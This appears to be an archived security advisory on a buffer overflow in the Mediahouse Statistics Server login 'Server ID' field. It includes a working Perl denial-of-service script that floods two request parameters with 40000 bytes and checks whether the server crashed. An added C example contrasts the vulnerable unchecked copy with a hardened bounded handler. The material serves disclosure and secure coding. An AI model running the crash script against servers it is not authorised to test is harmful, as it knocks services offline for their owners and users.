source: http://www.securityfocus.com/bid/734/info

The web interface for Statistics Server contains an unchecked buffer that accepts input from the "Server ID" field of the login web page. The login page limits the field to 16 characters, but that limit is enforced only client-side and is easily circumvented by editing the HTML to remove the restriction (or by sending the request directly, as the script below does). Entering a string of more than 3773 characters will crash the server. This bug could potentially be used to remotely execute arbitrary code.

#!/usr/bin/perl
###############################################################
# Sample DoS against the Mediahouse Statistics Server
# This was tested against 4.28 & 5.01 running on Windows NT 4.0
#
# Only use it to determine if your own Server is vulnerable!
#
# Per Bergehed ([email protected])
#
# http://w1.855.telia.com/~u85513179/security/exploits/mediahouse.html
#
# V1.0 - Check for "ss?form=statsredir&ID=..." buffer overflow.
# V1.1 - added check for "ss?form=setsite&ID=..." buffer overflow.
#
use strict;
use warnings;
use IO::Socket;

our $remote;   # current connection, set by opensocket()

print "############################################################\n";
print "# Simple DoS-attack against the Mediahouse Statistics Server\n";
print "# Tested with version 4.28 & 5.01\n";
print "\n";

if ($#ARGV != 0) { die "-> Please give the host address as argument.\n" }

# Send both oversized requests on one connection. The 40000-byte field is far
# above the 3773-byte threshold described above. A leading "/" makes the request
# line valid HTTP/1.0 and CRLF terminates the request as the RFC requires
# (the original script sent "ss?..." with bare "\n\n", which the server tolerated).
opensocket ("\n");
print $remote "GET " . "/ss?setsite=" . "A" x 40000 . "& HTTP/1.0\r\n\r\n";
print $remote "GET " . "/ss?form=statsredir&ID=" . "A" x 40000 . "& HTTP/1.0\r\n\r\n";
close $remote;

# Give the server a moment to fall over before probing it again.
sleep 2;

# If port 80 no longer accepts connections, opensocket() dies with the
# "vulnerable" message passed in; if it still answers, the server survived.
opensocket ("\n-> The server seemed to be vulnerable to this attack\n");
close $remote;
die "-> The server does not seem to be vulnerable to this attack\n";

sub opensocket {
    $remote = IO::Socket::INET->new (
        Proto    => "tcp",
        PeerAddr => $ARGV[0],
        PeerPort => "http(80)",
    ) || die "# Can't open http-port on $ARGV[0]$_[0]";
    $remote->autoflush(1);
}

# EOF
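The advisory's point is that the 16-character limit lives only in the HTML form, so the server must enforce the bound itself. The following is an added example in C, not code from the advisory, from Mediahouse, or from the Perl check above; it shows the vulnerable pattern (an unchecked strcpy into a fixed buffer) next to a hardened query-parameter accessor that refuses over-length values before any copy happens. The function names (get_param_bounded, handle_statsredir, probe_id_length) and the status codes returned are assumptions made for the illustration; nothing here is the real server's code. probe_id_length builds the same "form=statsredir&ID=AAAA..." query the script sends, with a constructed ID of n bytes, and runs it through the hardened handler.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Bound the login form tries to enforce with a client-side 16-character limit.
 * The server must enforce it itself: the HTML limit is not a security control. */
#define SERVER_ID_MAX 16

/* Vulnerable pattern, shown for contrast only (never call with untrusted input):
 * a fixed buffer filled by strcpy() from a request field of arbitrary length.
 * This is the shape of bug the advisory describes, where >3773 bytes crash the server. */
static void copy_id_unchecked(char *dst, const char *val)
{
    strcpy(dst, val);                  /* no length check at all */
}

/* Hardened accessor (assumed helper): find query parameter `name` in `query`
 * (the text after '?') and copy its value into `out`, which holds out_size-1
 * bytes plus the NUL. Returns 1 if found and copied, 0 if absent, -1 if
 * present but too long (then `out` is left as an empty string). */
int get_param_bounded(const char *query, const char *name, char *out, size_t out_size)
{
    size_t name_len = strlen(name);
    const char *p = query;

    if (out_size == 0) return -1;
    out[0] = '\0';

    while (p != NULL && *p != '\0') {
        const char *amp = strchr(p, '&');
        size_t pair_len = amp ? (size_t)(amp - p) : strlen(p);

        /* match "name=" exactly, not a longer name that shares the prefix */
        if (pair_len > name_len && strncmp(p, name, name_len) == 0 && p[name_len] == '=') {
            const char *val = p + name_len + 1;
            size_t val_len = pair_len - name_len - 1;

            if (val_len >= out_size) return -1;   /* would not fit with the NUL */
            memcpy(out, val, val_len);
            out[val_len] = '\0';
            return 1;
        }
        p = amp ? amp + 1 : NULL;
    }
    return 0;
}

/* Assumed handler for "ss?form=statsredir&ID=...": returns an HTTP status code.
 * Over-length IDs are refused before anything is written into the fixed buffer. */
int handle_statsredir(const char *query)
{
    char id[SERVER_ID_MAX + 1];
    int rc = get_param_bounded(query, "ID", id, sizeof id);

    if (rc < 0) return 413;             /* too long: refuse, do not truncate silently */
    if (rc == 0 || id[0] == '\0') return 400;
    return 200;
}

/* Build the query the Perl check sends, with a constructed ID of n 'A's,
 * and run it through the hardened handler. Returns the status code. */
int probe_id_length(size_t n)
{
    const char *prefix = "form=statsredir&ID=";
    size_t prefix_len = strlen(prefix);
    char *query = malloc(prefix_len + n + 1);
    int status;

    if (query == NULL) return -1;
    memcpy(query, prefix, prefix_len);
    memset(query + prefix_len, 'A', n);
    query[prefix_len + n] = '\0';

    status = handle_statsredir(query);
    free(query);
    return status;
}

int main(void)
{
    size_t lengths[] = { 16, 17, 3774, 40000 };
    char small[SERVER_ID_MAX + 1];

    /* The unchecked copy is only safe while the caller guarantees the bound. */
    copy_id_unchecked(small, "abc");
    printf("unchecked copy of a short value: %s\n", small);

    for (size_t i = 0; i < sizeof lengths / sizeof lengths[0]; i++)
        printf("ID of %zu bytes -> HTTP %d\n", lengths[i], probe_id_length(lengths[i]));
    return 0;
}
```

The hardened handler rejects rather than truncates: silently cutting a 40000-byte ID down to 16 would hide the probe from logs and could turn one identifier into another. Refusing with a status code keeps the failure visible and keeps the copy bounded regardless of what the form claimed.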